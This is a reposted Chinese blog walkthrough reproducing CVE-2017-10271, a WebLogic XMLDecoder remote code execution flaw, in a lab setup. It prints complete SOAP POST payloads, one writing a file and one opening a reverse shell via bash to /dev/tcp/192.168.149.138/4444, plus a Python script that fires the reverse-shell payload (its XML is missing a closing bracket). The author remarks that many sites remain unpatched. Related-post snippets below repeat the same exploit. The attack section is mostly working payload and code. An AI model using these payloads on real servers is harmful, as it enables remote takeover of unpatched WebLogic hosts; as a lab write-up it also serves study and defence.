CVE-2017-10271复现

最新推荐文章于 2024-05-24 22:57:12 发布
最新推荐文章于 2024-05-24 22:57:12 发布
阅读量122 收藏
点赞数
原文链接:http://www.cnblogs.com/Id3al/p/10931489.html
版权

编号:CVE-2017-10271

作者:Id3al

复现时间:2019-5-26

最近在工作中偶遇到关于weblogic的几个洞,分别是CVE-2017-10271、CVE-2017-2628等,于是便想着深入学习下这几个漏洞,本篇文章主要复现CVE-2017-10271漏洞,下面会从搭建环境开始一步一步复现

先介绍下环境

 

环境搭建

Linux:
系统:centos6.9
IP:192.168.149.139
Weblogic版本:10.3.6.0
java版本:JDK 1.8.0_212

Linux下安装weblogic的步骤如下:

mkdir -p /usr/local/soft/weblogic //创建weblogic安装目录

groupadd weblogic //创建weblogic用户组

useradd -m -g weblogic -G weblogic weblogic //添加新用户weblogic并添加进weblogic用户组

chown -R weblogic:weblogic /usr/local/soft/Weblogic/ //更改weblogic安装目录权限

java -jar wls1036_generic.jar //开始安装

安装上述步骤进行安装,后续会进入图形化界面或者默认安装界面,以及后续domian的配置都可以参考以下文章,此处不再赘述

 https://blog.csdn.net/qq_23014435/article/details/78043643

ok,现在环境搭建成功了,接下来先了解下CVE-2017-10271这个漏洞吧

漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,利用此漏洞可以进行任意命令执行,很多挖矿也使用了此类漏洞。

受影响的weblogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0

漏洞复现

简单测试是否存在漏洞,直接访问http://192.168.149.139:7001/wls-wsat/CoordinatorPortType,如果返回如下页面则可能存在漏洞

使用检查工具进行检查

 

确定真实存在CVE-2017-12071漏洞,接下来使用POC的方式进行验证

第一种方式:

采用burp抓包提交POC,测试的POC如下:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.149.139:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 673

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
<string>xmldecoder_vul_test</string></void><void method="close"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
其中需要注意的是
1.需要以POST格式提交
2.请求头中必须要带上Upgrade-Insecure-Requests:1,以及Content-Type: text/xml,否则可能会报415错误,以下表示已经成功

 

 

看下机器上的文件以及访问的效果

 

写个文件很不过瘾,现在反弹个shell试下,POC使用如下:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.149.139:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 1148

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.149.138/4444 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在139机器上使用nc监听端口,在Burp中执行POC后反弹成功

接下来使用py脚本来反弹吧

反弹成功,贴上py脚本

import requests
def run(url):
"""CVE-2017-10271"""
url = url + ":7001/wls-wsat/CoordinatorPortType"
print(url)
headers = {
"Content-Type":"text/xml;charset=UTF-8",
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
xml = """
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder"
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.149.138/4444 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>"""
req = requests.post(url, headers=headers, data=xml, timeout=5)
if req.status_code == 500:
return "WebLogic XMLDecoder Vulnerable"
else:
return False
print(run("http://192.168.149.139"))

总结

关于CVE-2017-10271这个洞还是有很多网站没有做过修复,此处复现也只是在Linux环境下,有兴趣的童鞋也可以在windows环境下试试,从搭建环境开始,再到漏洞利用,中间会学习到很多知识滴

 

转载于:https://www.cnblogs.com/Id3al/p/10931489.html

weixin_30619101
关注
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271复现)
薛定谔嘚喵博客
05-07 721
CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。漏洞触发url漏洞本质:主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。
Weblogic CVE-2017-10271漏洞复现
君莫hacker的博客
09-09 1490
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
CVE-2017-10271漏洞复现
qq_36594628的博客
07-27 5392
CVE-2017-10271复现 一、启动环境 ​ 靶机:ubantu20.04 IP:192.168.3.115 ​ 攻击机:win10 IP:192.168.1.238 ​ 在ubantu 20.04 搭建 Vulhub 环境中已经介绍了怎么启动环境。 二、漏洞信息 ​ WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。 (一)、漏洞描述 ​ 在了解CVE-2017
Weblogic(CVE-2017-10271)的漏洞复现
陈瘦瘦的迪迦的博客
08-05 1220
Weblogic(CVE-2017-10271)漏洞复现 漏洞形成原因 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 漏洞如何利用 利用服务器的XMLDecoder可以解析XML数据这一特性,可以构造XML语句,上传一句话木马,getshell。 漏洞复现过程 Kali docker 容器中启动此漏洞环境 浏览器访问 Kali 的 ip 地址并接上
weblogic----CVE-2017-10271漏洞复现
qq_43571759的博客
04-07 1249
CVE-2017-10271漏洞复现 漏洞描述: Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 序列化: 明明序列化那么多漏洞为什么还要序列化?因为便于传输,第一次接触到序列化是PHP的序列化,当时个人理解就是把一个对象转换成字符串进行传输,需要使用的时...
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。... 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -...
WebLogic WLS远程执行漏洞(CVE-2017-10271)验证
12-18
一段小代码,WebLogic WLS远程执行漏洞(CVE-2017-10271)验证。
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET weblogic ip and port(eg -> 172.16.80.131:7001) -c CMD, --cmd CMD command to execute,default is "id" -o OUTPUT, --output OUTPUT output file name,default is output.txt -s SHELL, --shell SHELL local jsp file name to upload,and set -o xxx.jsp
Weblogic Rce CVE-2017-10271复现
Le1a's Blog
01-27 1829
Weblogic Rce CVE-2017-10271复现 一、环境搭建 使用vulhub来搭建,进入/weblogic/CVE-2017-10271文件夹,修改其中的docker-compose.yml文件,将8453端口打开 使用docker-compose命令docker-compose up -d编译镜像并启动容器 使用docker exec -it b3 /bin/bash命令进入容器内,自带的vi用得很不习惯,所以进去使用apt-get install nano命令安装一下nano 然后使用
weblogic CVE-2017-10271漏洞复现
qq_46804551的博客
04-09 299
搭建 cd vulhub-master/weblogic/CVE-2017-10271/ docker-compose up -d 访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动 复现 1.初步判断:访问 http://192.168.12.147:7001/wls-wsat/CoordinatorPortType11,存在下图则说明可能存在漏洞 2.nc监听端口,构造POST包进行测试,反弹shell 使用nc 监听 21端口 nc -lvp 22
漏洞复现:Weblogic CVE-2017-10271
m_ing
07-02 422
前言:还不会复现的快来打我! 漏洞描述 WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。 涉及版本 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 环境搭建 我们采用Vulhub搭建方便快捷。Vulhub是一个基于docker和docker-compose的漏洞环境集合,配合docker进行使用。 我们先康康怎么安装Vulhub 运行以下命令
Weblogic CVE-2017-10271 漏洞复现
weixin_44533592的博客
03-05 486
Weblogic CVE-2017-10271 漏洞复现 漏洞简介 WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271) WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击 影响范围 Oracle WebLogic Server10.3.6.0.0 Oracle WebLogic Server12.1.3.0.0 Oracle WebLogic Server12.2.1.1.0 Oracle W
Weblogic反序列化漏洞复现CVE-2017-10271
qq_34853514的博客
07-02 606
漏洞简介 漏洞编号: CVE-2017-10271 漏洞详情: Oracle Fusion Middleware 中的 Oracle WebLogic Server 组件的 WLS Security 子组件存 在安全漏洞。使用精心构造的 xml 数据可能造成任意代码执行,攻击者只需要发送精心构造 的 HTTP 请求,就可以拿到目标服务器的权限。攻击者可利用该漏洞控制组件,影响数据的 可用性、保密性和完整性。 漏洞影响范围: Oracle WebLogic Server 10.3.6.0.0 版本 Oracl
WebLogic(CVE-2017-10271)漏洞复现
weixin_51203422的博客
11-16 3850
docker vulhub搭建好靶场 访问:ip:7001 看到404就说明安装成功,开始进入下一步 访问该链接,显示如下就可能存在漏洞(因为是靶机,所以嘛,肯定有漏洞了) http://ip:port/wls-wsat/CoordinatorPortType 本地起好监听 nc -lp port 与下方红字对应 ``` POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: ip:7001 Accept-Encoding: gz..
weblogic CVE-2017-10271漏洞复现
最新发布
qq_68581192的博客
05-24 1078
名称:weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)原理:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者可以构造XML语句,上传一句话木马,getshell。
cve-2017-10271漏洞复现
06-28
CVE-2017-10271漏洞是Oracle WebLogic Server中的一个远程代码执行漏洞。攻击者可以通过发送特制的HTTP请求来利用该漏洞,从而在受影响的系统上执行任意代码。该漏洞已经被公开披露,并且已经有一些工具可以用来复现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值